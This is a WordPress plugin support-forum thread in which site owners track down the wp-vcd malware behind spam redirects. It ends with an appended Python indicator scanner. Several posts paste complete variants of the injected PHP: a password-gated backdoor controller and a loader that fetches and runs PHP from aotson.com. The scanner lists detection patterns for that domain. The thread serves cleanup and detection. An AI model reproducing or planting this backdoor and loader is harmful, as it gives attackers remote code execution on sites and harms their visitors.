Plugin: Anti-Malware Security and Brute-Force Firewall » Can’t find the backdoor (malware)

  • Resolved kvandelaak

    (@kvandelaak)


    Every time I browse to my website, http://www.monkdesigns.co.za, I get redirected to some spam sites. On mobile it gives me an uber popup message. I found some strings with your app but can’t remove it.

    This is what I see through the Firefox dev view:

    <script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=628268&interactive=1&pushup=1"></script>
    <script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=1063894"></script>

    On every page this code comes back, but I have no idea where it hides in the WordPress PHP.

    Please help!

    • This topic was modified 7 months, 2 weeks ago by  kvandelaak.
Viewing 15 replies - 1 through 15 (of 28 total)
  • Plugin Author Eli

    (@scheeeli)

    Make sure you have downloaded the latest definition updates, then my plugin should be able to remove that threat for you. If not then please post a screenshot so I can see what the problem might be.

    @kvandelaak Have you managed to solve the problem? I have the same script and I don’t know where to find it or how it appeared.

    @scheeeli I updated your plugin but it didn’t find anything on my site.
    These are my two infected sites:
    storeposter.pl
    brevisforte.ariel1.usermd.net

    Can you help me guys please?

    Hi,

    I managed to get rid of it for now.
    Check your functions.php and remove the infected code (at the top of the PHP file).
    Mine was also in index.php and I replaced it with the original index.php.

    No more pop ups.

    Plugin Author Eli

    (@scheeeli)

    @kvandelaak,
    Can you please send me those infected files that you found so that I can add that malicious code to my definition updates?

    Studiogyn – Soluções para web has the solution for this problem; visit http://www.studiogyn.com.br and request a scan of your site!

    • This reply was modified 7 months, 2 weeks ago by  studiogyn.

    I can’t find it anywhere. I checked everything. Can you please send this code? Because I don’t know what to do at all…

    I believe it is this code at the top of the functions. Not sure.
    Also, check your index.php and find the spam link there. Maybe replace it with the original.

    <?php

    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '63cc58790b6b2e90e60158b74655aa9f'))
    {
    $div_code_name="wp_vcd";
    switch ($_REQUEST['action'])
    {
    case 'get_all_links';
    foreach ($wpdb->get_results('SELECT * FROM ' . $wpdb->prefix . 'posts WHERE post_status = "publish" AND post_type = "post" ORDER BY ID DESC', ARRAY_A) as $data)
    {
    $data['code'] = '';

    if (preg_match('!<div id="'.$div_code_name.'">(.*?)</div>!s', $data['post_content'], $_))
    {
    $data['code'] = $_[1];
    }

    print '<e><w>1</w><url>' . $data['guid'] . '</url>' . $data['code'] . '<id>' . $data['ID'] . '</id></e>' . "\r\n";
    }
    break;

    case 'set_id_links';
    if (isset($_REQUEST['data']))
    {
    $data = $wpdb -> get_row('SELECT post_content FROM ' . $wpdb->prefix . 'posts WHERE ID = "'.mysql_escape_string($_REQUEST['id']).'"');

    $post_content = preg_replace('!<div id="'.$div_code_name.'">(.*?)</div>!s', '', $data -> post_content);
    if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="'.$div_code_name.'">' . stripcslashes($_REQUEST['data']) . '</div>';

    if ($wpdb->query('UPDATE ' . $wpdb->prefix . 'posts SET post_content = "' . mysql_escape_string($post_content) . '" WHERE ID = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
    {
    print "true";
    }
    }
    break;

    case 'change_div';
    if (isset($_REQUEST['newdiv']))
    {

    if (!empty($_REQUEST['newdiv']))
    {
    if ($file = @file_get_contents(__FILE__))
    {
    if(preg_match_all('/\$div_code_name="(.*)";/i',$file,$matcholddiv))
    {
    echo $matcholddiv[1][0];
    $file = preg_replace('/'.$matcholddiv[1][0].'/i',$_REQUEST['newdiv'], $file);
    @file_put_contents(__FILE__, $file);
    print "true";
    }

    }
    }
    }
    break;

    I got it!

    This is the code:

    <?php

    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '20a89d6ed8e1c98a52dbf0ae879deafd'))
    {
        $div_code_name="wp_vcd";
        switch ($_REQUEST['action'])
        {
            case 'get_all_links';
                foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
                {
                    $data['code'] = '';

                    if (preg_match('!<div id="'.$div_code_name.'">(.*?)</div>!s', $data['post_content'], $_))
                    {
                        $data['code'] = $_[1];
                    }

                    print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
                }
            break;

            case 'set_id_links';
                if (isset($_REQUEST['data']))
                {
                    $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');

                    $post_content = preg_replace('!<div id="'.$div_code_name.'">(.*?)</div>!s', '', $data -> post_content);
                    if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="'.$div_code_name.'">' . stripcslashes($_REQUEST['data']) . '</div>';

                    if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
                    {
                        print "true";
                    }
                }
            break;

            case 'change_div';
                if (isset($_REQUEST['newdiv']))
                {
                    if (!empty($_REQUEST['newdiv']))
                    {
                        if ($file = @file_get_contents(__FILE__))
                        {
                            if(preg_match_all('/\$div_code_name="(.*)";/i',$file,$matcholddiv))
                            {
                                echo $matcholddiv[1][0];
                                $file = preg_replace('/'.$matcholddiv[1][0].'/i',$_REQUEST['newdiv'], $file);
                                @file_put_contents(__FILE__, $file);
                                print "true";
                            }
                        }
                    }
                }
            break;

            case 'change_domain';
                if (isset($_REQUEST['newdomain']))
                {
                    if (!empty($_REQUEST['newdomain']))
                    {
                        if ($file = @file_get_contents(__FILE__))
                        {
                            if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                            {
                                $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                @file_put_contents(__FILE__, $file);
                                print "true";
                            }
                        }
                    }
                }
            break;

            case 'create_page';
                if (isset($_REQUEST['remove_page']))
                {
                    if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
                    {
                        print "true";
                    }
                }
                elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
                {
                    if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
                    {
                        print "true";
                    }
                }
            break;

            default: print "ERROR_WP_ACTION WP_V_CD";
        }

        die("");
    }


    if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    {
        $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
        if ($data -> full_content)
        {
            print stripslashes($data -> content);
        }
        else
        {
            print '<!DOCTYPE html>';
            print '<html ';
            language_attributes();
            print ' class="no-js">';
            print '<head>';
            print '<title>'.stripslashes($data -> title).'</title>';
            print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
            print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
            print '<meta name="robots" content="index, follow" />';
            print '<meta charset="';
            bloginfo( 'charset' );
            print '" />';
            print '<meta name="viewport" content="width=device-width">';
            print '<link rel="profile" href="http://gmpg.org/xfn/11">';
            print '<link rel="pingback" href="';
            bloginfo( 'pingback_url' );
            print '">';
            wp_head();
            print '</head>';
            print '<body>';
            print '<div id="content" class="site-content">';
            print stripslashes($data -> content);
            get_search_form();
            get_sidebar();
            get_footer();
        }

        exit;
    }

    if ( ! function_exists( 'wp_temp_setup' ) ) {
    $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];

    if($tmpcontent = @file_get_contents("http://www.aotson.com/code.php?i=".$path))
    {

    function wp_temp_setup($phpCode) {
        $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setup");
        $handle = fopen($tmpfname, "w+");
        fwrite($handle, "<?php\n" . $phpCode);
        fclose($handle);
        include $tmpfname;
        unlink($tmpfname);
        return get_defined_vars();
    }

    extract(wp_temp_setup($tmpcontent));
    }
    }

    ?>

    In your functions.php look for these snippets; if you find them, just remove them, that is where your headache is. For more information visit http://www.studiogyn.com.br

    if ( ! function_exists( 'wp_temp_setup' ) ) {
    $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];

    if($tmpcontent = @file_get_contents("http://www.aotson.com/code.php?i=".$path))
    {

    function wp_temp_setup($phpCode) {
    $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setup");
    $handle = fopen($tmpfname, "w+");
    fwrite($handle, "<?php\n" . $phpCode);
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
    }

    extract(wp_temp_setup($tmpcontent));
    }
    }

    Plugin Author Eli

    (@scheeeli)

    Both of these variants are in my latest definition update 😉

    I found this article after my site got infected with the same kind of malware as kvandelaak.
    I downloaded the complete site and searched for the domain aotson.com and it led me to this article…
    My site is infected with this malware…
    I hope Eli the plugin author will find it interesting.
    Thx
    https://medium.com/@cirku17/wp-vcd-malware-analysis-7c5dbaad89c3

    I’m trying to track back the changes I made prior to this infection…
    and it’s getting interesting…
    It looks like I got it just after (half an hour after) I updated my website to WP v4.8.1.

    As I say… this is the method the hackers used to inject these scripts into a web site…
    It behaves strangely because when I’m logged in the injected scripts disappear, just as is described in this post I collected on the web in my research on the nature of these injections:
    http://wordpressrelated.com/wordpress-virus-popads-script-added-on-wp_footer-action/

    In my WordPress site a script is added in the footer on the wp_footer action.

    //Virus Script, hooked on wp_footer
    <script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=1063894"></script>
    The script shows in all themes (including default themes). I have disabled
    all plugins but it still shows.
    I am using WP 4.7.3, so I replaced the wp-admin/wp-includes folders with freshly downloaded files. (Problem not solved)
    I replaced the twentyseventeen theme with fresh files; now the virus script does not show
    in the default themes but is still showing in my main theme.
    I searched in my theme; there is no eval(), base64_decode(), x64
    kind of code.
    I printed the whole list of wp_footer hooks but that did not help me..
    Installed the “simple show hooks” plugin, it also did not work.
    This virus script does not work when an admin/user is logged in, so I also tried to find an is_user_logged_in() call but found nothing.
    I searched the whole database for “x64, eval(, base64, apu, etc” and also found nothing in the db.
    Installed Anti-Malware Security but it is not working.
    If I remove the wp_footer() function, then the virus script does not show.
    What should I do now?
    How do I find the virus location/hook?

    Is there any WP action/filter that hooks after each action/filter is hooked??

    Read more here: WordPress virus, popads script added on wp_footer action

    This is the code in MY THEME’S functions.php right at the beginning… I’m a newbie but I can assume that it exploits WP XMLRPC access; you can see that in the code line that has xmlrpc.php, so from now on I keep my XMLRPC access blocked… mean mf indeed
    <?php

    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'cde4ed8a6a12b232f084f7156e7cfdf3'))
    {
    $div_code_name="wp_vcd";
    switch ($_REQUEST['action'])
    {

    case 'change_domain';
    if (isset($_REQUEST['newdomain']))
    {

    if (!empty($_REQUEST['newdomain']))
    {
    if ($file = @file_get_contents(__FILE__))
    {
    if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code7\.php/i',$file,$matcholddomain))
    {

    $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
    @file_put_contents(__FILE__, $file);
    print "true";
    }

    }
    }
    }
    break;

    default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }

    die("");
    }

    if ( ! function_exists( 'wp_temp_setup' ) ) {
    $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
    if ( ! is_admin() && ! is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

    if($tmpcontent = @file_get_contents("http://www.aotson.com/code7.php?i=".$path))
    {

    function wp_temp_setup($phpCode) {
    $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setup");
    $handle = fopen($tmpfname, "w+");
    fwrite($handle, "<?php\n" . $phpCode);
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
    }

    extract(wp_temp_setup($tmpcontent));
    }
    }
    }

    ?>
    I ran a scan on my two websites and it seems that it detects the injected code part in the theme’s functions.php file but doesn’t detect the injected parts, i.e. wp-vcd.php and class.wp.php, but I guess that is covered by some other forms of protection.
    Anyway, thanks… I hope someone will get some kind of help from this info…

    I also noticed that when I use some form of ad blocker the redirections go unnoticed, but when you try to navigate the web pages on your mobile phone or on a desktop (without an ad blocker and not logged in as admin) you see the full scale of these rather annoying redirect popups.
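Several posters above found the infection only by downloading the whole site and grepping for strings such as aotson.com. As an added example (not code from this thread, the plugin, or the malware author), here is a small Python scanner that walks a downloaded copy of a WordPress site and reports every .php file and line matching the indicator strings that appear in the wp-vcd samples posted above; the sample tree it builds is constructed for the demonstration and contains only those isolated indicator lines.

```python
import os
import re
import tempfile

# Indicator patterns lifted from the wp-vcd samples posted in this thread.
WP_VCD_INDICATORS = [
    ("wp_vcd div marker", re.compile(r'\$div_code_name\s*=\s*["\']wp_vcd["\']')),
    ("wp_temp_setup remote code loader", re.compile(r'wp_temp_setup')),
    ("remote fetch of code*.php", re.compile(r'file_get_contents\(\s*["\']https?://[^"\']+/code\d*\.php')),
    ("C2 domain aotson.com", re.compile(r'aotson\.com')),
    ("controller error string", re.compile(r'ERROR_WP_ACTION\s+WP_V_CD')),
    ("datalist table access", re.compile(r"\$wpdb->prefix\s*\.\s*['\"]datalist")),
]

def scan_file(path):
    """Return (label, line_no, excerpt) for every indicator line found in one PHP file."""
    hits = []
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for line_no, line in enumerate(fh, 1):
            for label, rx in WP_VCD_INDICATORS:
                if rx.search(line):
                    hits.append((label, line_no, line.strip()[:80]))
    return hits

def scan_tree(root):
    """Walk a downloaded copy of the site; map relative path -> hits for each flagged .php file."""
    findings = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                hits = scan_file(full)
                if hits:
                    findings[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return findings

# Constructed sample tree (not a real site): a theme functions.php carrying only the
# indicator lines from the posted samples, next to a clean file that hooks wp_footer.
INFECTED_FUNCTIONS_PHP = """<?php
$div_code_name="wp_vcd";
if ( ! function_exists( 'wp_temp_setup' ) ) {
$tmpcontent = @file_get_contents("http://www.aotson.com/code7.php?i=".$path);
}
"""
CLEAN_PLUGIN_PHP = "<?php\nadd_action('wp_footer', 'my_theme_footer_note');\n"

def build_sample_tree():
    root = tempfile.mkdtemp(prefix="wpvcd_scan_")
    theme = os.path.join(root, "wp-content", "themes", "mytheme")
    os.makedirs(theme)
    with open(os.path.join(theme, "functions.php"), "w") as fh:
        fh.write(INFECTED_FUNCTIONS_PHP)
    with open(os.path.join(root, "wp-content", "clean.php"), "w") as fh:
        fh.write(CLEAN_PLUGIN_PHP)
    return root
```

Calling scan_tree(build_sample_tree()) flags only wp-content/themes/mytheme/functions.php, with four indicator hits on lines 2 to 4; pointing scan_tree at a downloaded copy of a real site gives the same file:line report, including files such as wp-vcd.php or class.wp.php that a theme-only check would miss.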

    Plugin Author Eli

    (@scheeeli)

    Thanks for posting this additional code. I have added this new variation to my definition updates.
